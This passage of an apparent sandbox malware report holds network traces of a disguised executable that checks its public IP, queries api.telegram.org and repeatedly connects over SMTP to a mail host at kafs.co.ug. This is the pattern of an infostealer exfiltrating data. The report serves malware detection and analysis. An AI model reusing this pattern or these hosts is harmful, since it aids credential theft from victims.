                                                                                                      Oct 25, 2024 09:18:27.107835054 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:27.113454103 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:27.118755102 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:27.277189016 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:27.278655052 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:27.284167051 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:27.442811966 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:27.443223000 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:27.448729992 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:27.618113041 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:27.618520975 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:27.624023914 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:27.806359053 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:27.806718111 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:27.812200069 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:27.989905119 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:27.996187925 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:28.001727104 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:28.159889936 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:28.160912037 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:28.160912991 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:28.160912991 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:28.160912991 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:28.166570902 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:28.166582108 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:28.166835070 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:28.354264021 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:28.407593012 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:29.754060030 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:29.754539967 CEST4974980192.168.2.4193.122.130.0
                                                                                                      Oct 25, 2024 09:18:29.759841919 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:29.759974957 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:30.363224030 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:30.363590956 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:30.369661093 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:30.525639057 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:30.526115894 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:30.531522989 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:30.688656092 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:30.689256907 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:30.694689989 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:30.856904030 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:30.856926918 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:30.856942892 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:30.856951952 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:30.857039928 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:30.857085943 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:30.859112978 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:30.864454985 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.021244049 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.026710987 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:31.032098055 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.189497948 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.190547943 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:31.196064949 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.352897882 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.355957985 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:31.361422062 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.520215988 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.524898052 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:31.530472040 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.712662935 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.715848923 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:31.721471071 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.893815994 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:31.894040108 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:31.899415970 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:32.220639944 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:32.221373081 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:32.221426010 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:32.221445084 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:32.221472979 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:32.229067087 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:32.229078054 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:32.230066061 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:32.230074883 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:33.465142965 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:33.465323925 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:33.465384007 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:33.465496063 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:33.465538979 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:18:33.465732098 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:18:33.465778112 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:20:04.921339035 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:20:04.926753998 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:20:05.085673094 CEST58749779104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:20:05.086663008 CEST49779587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:20:09.780473948 CEST49780587192.168.2.4104.243.33.38
                                                                                                      Oct 25, 2024 09:20:09.785945892 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:20:09.942873955 CEST58749780104.243.33.38192.168.2.4
                                                                                                      Oct 25, 2024 09:20:09.943377018 CEST49780587192.168.2.4104.243.33.38

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 25, 2024 09:18:02.402071953 CEST6131153192.168.2.41.1.1.1
                                                                                                      Oct 25, 2024 09:18:02.410170078 CEST53613111.1.1.1192.168.2.4
                                                                                                      Oct 25, 2024 09:18:04.628822088 CEST5633553192.168.2.41.1.1.1
                                                                                                      Oct 25, 2024 09:18:04.639488935 CEST53563351.1.1.1192.168.2.4
                                                                                                      Oct 25, 2024 09:18:18.293863058 CEST5148253192.168.2.41.1.1.1
                                                                                                      Oct 25, 2024 09:18:18.301110029 CEST53514821.1.1.1192.168.2.4
                                                                                                      Oct 25, 2024 09:18:24.901798010 CEST5059653192.168.2.41.1.1.1
                                                                                                      Oct 25, 2024 09:18:25.606920004 CEST53505961.1.1.1192.168.2.4

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Oct 25, 2024 09:18:02.402071953 CEST192.168.2.41.1.1.10x7ec0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:04.628822088 CEST192.168.2.41.1.1.10x408fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:18.293863058 CEST192.168.2.41.1.1.10x3658Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:24.901798010 CEST192.168.2.41.1.1.10xe4efStandard query (0)mail.kafs.co.ugA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Oct 25, 2024 09:18:02.410170078 CEST1.1.1.1192.168.2.40x7ec0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:02.410170078 CEST1.1.1.1192.168.2.40x7ec0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:02.410170078 CEST1.1.1.1192.168.2.40x7ec0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:02.410170078 CEST1.1.1.1192.168.2.40x7ec0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:02.410170078 CEST1.1.1.1192.168.2.40x7ec0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:02.410170078 CEST1.1.1.1192.168.2.40x7ec0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:04.639488935 CEST1.1.1.1192.168.2.40x408fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:04.639488935 CEST1.1.1.1192.168.2.40x408fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:18.301110029 CEST1.1.1.1192.168.2.40x3658No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:25.606920004 CEST1.1.1.1192.168.2.40xe4efNo error (0)mail.kafs.co.ugkafs.co.ugCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 25, 2024 09:18:25.606920004 CEST1.1.1.1192.168.2.40xe4efNo error (0)kafs.co.ug104.243.33.38A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • reallyfreegeoip.org
                                                                                                      • api.telegram.org
                                                                                                      • checkip.dyndns.org

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449735193.122.130.0801260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:02.420911074 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:03.298923969 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:03 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 03cdcc17f073dd2afa1ab36a286c9dcf
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
                                                                                                      Oct 25, 2024 09:18:03.305005074 CEST127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Oct 25, 2024 09:18:04.494503975 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:04 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 118feeffaac86ae4d78e6753fc434cc6
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
                                                                                                      Oct 25, 2024 09:18:05.574465036 CEST127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Oct 25, 2024 09:18:05.732852936 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:05 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 2d1906e079fe365e9bc1be7d01ace4d5
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449740193.122.130.0801260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:06.529268026 CEST127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Oct 25, 2024 09:18:07.213610888 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:07 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: cc676d657f8f64ef8942483f7ae427f5
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449742193.122.130.0807448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:07.308840990 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:07.969799042 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:07 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 6e362202fddcc2f08308556d6c71fdbe
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
                                                                                                      Oct 25, 2024 09:18:07.974605083 CEST127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Oct 25, 2024 09:18:08.132110119 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:08 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: c66ad35d38ac976d66ee9f2adac2b712
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
                                                                                                      Oct 25, 2024 09:18:09.587796926 CEST127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Oct 25, 2024 09:18:09.761153936 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:09 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: b42d970f6b70e7403d835b335788129a
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>
                                                                                                      Oct 25, 2024 09:18:10.125269890 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:09 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: b42d970f6b70e7403d835b335788129a
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.449743193.122.130.0801260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:07.984869957 CEST127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Oct 25, 2024 09:18:08.649631977 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:08 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: b47ed624f4d6bbff0484b6cbcb18ef16
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.449746193.122.130.0801260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:09.417397976 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:10.125893116 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:10 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: c758145f9593442ca46c02db27b1f202
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.449749193.122.130.0807448C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:10.527626038 CEST127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Oct 25, 2024 09:18:11.211352110 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:11 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 8187866ac1c89b21883caebc32e6647e
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.449750193.122.130.0801260C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 25, 2024 09:18:10.908457041 CEST151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Oct 25, 2024 09:18:11.696222067 CEST323INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 25 Oct 2024 07:18:11 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 106
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 7116975d6190b5a808d93a1067b793df
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.81</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
